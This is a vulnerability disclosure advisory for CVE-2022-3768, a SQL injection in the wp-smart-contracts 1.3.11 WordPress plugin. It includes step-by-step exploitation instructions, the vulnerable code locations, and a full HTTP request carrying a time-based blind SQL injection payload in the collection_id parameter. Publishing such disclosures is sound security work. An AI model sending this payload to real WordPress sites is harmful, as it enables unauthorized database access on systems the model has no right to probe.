wp-smart-contracts 1.3.11 WordPress plug-in SQL injection

Vulnerability Metadata

Key Value
Date of Disclosure November 07 2022
Affected Software wp-smart-contracts
Affected Software Type WordPress plugin
Version 1.3.11
Weakness SQL Injection
CVE ID CVE-2022-3768
CVSS 3.x Base Score 8.8
CVSS 2.0 Base Score n/a
Reporter Kunal Sharma, Daniel Krohmer
Reporter Contact k_sharma19@informatik.uni-kl.de
Link to Affected Software https://wordpress.org/plugins/wp-smart-contracts/
Link to Vulnerability DB https://nvd.nist.gov/vuln/detail/CVE-2022-3768

Vulnerability Description

The collection_id GET query parameter in wp-smart-contracts 1.3.11 is vulnerable to SQL injection. An attacker with role of Author or above may abuse the final step of Bulk Minting functionality in wpsc-bulk-mint.php. This leads to a threat actor crafting a malicious GET request.

Exploitation Guide

Login as user with Author role or above. This attack requires at least Author privileges.



Go to Batch Mint NFTs under Smart Contracts Wizards option on the WordPress site dashboard.


Clicking Batch Mint NFTs triggers the vulnerable request.



The request needs to be modified by adding step, collection_id and uid. Here collection_id is the vulnerable query parameter.


A POC may look like the following request:


In the code, the vulnerability is triggered by un-sanitized user input of collection_id at line 651 in ./classes/wpsc-bulk-mint.php.


Furthermore, a call to WPSC_Queries::nftERC1155Collections at 666 in ./classes/wpsc-bulk-mint.php.


At line 32 in ./classes/wpsc-queries.php subsequent call to WPSC_Queries::nftCollections is made.


At lines 54-56 in ./classes/wpsc-queries.php the database query call on $cond leads to SQL injection.


Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below:

GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(4)))hlAf)&uid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/
Connection: close
Cookie: notice_hide_1_3_10=true; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_c9db569cb388e160e4b86ca1ddff84d7=tristian%7C1666737503%7CLrfm3tSfh5kthbnUFaHDaj6U4ZWZtZiRs76VMuwj11m%7C0b981aaa64eb6981822a62ae00f04fae8ddd7de70341e86d4ef9ca2869e1a887; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=tristian%7C1666737503%7CLrfm3tSfh5kthbnUFaHDaj6U4ZWZtZiRs76VMuwj11m%7C6cbaecf3b7240c32eb71ffedc809d75ef3d1ab25f5f44e17ba783a8155745385; wp-settings-time-5=1666564746
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1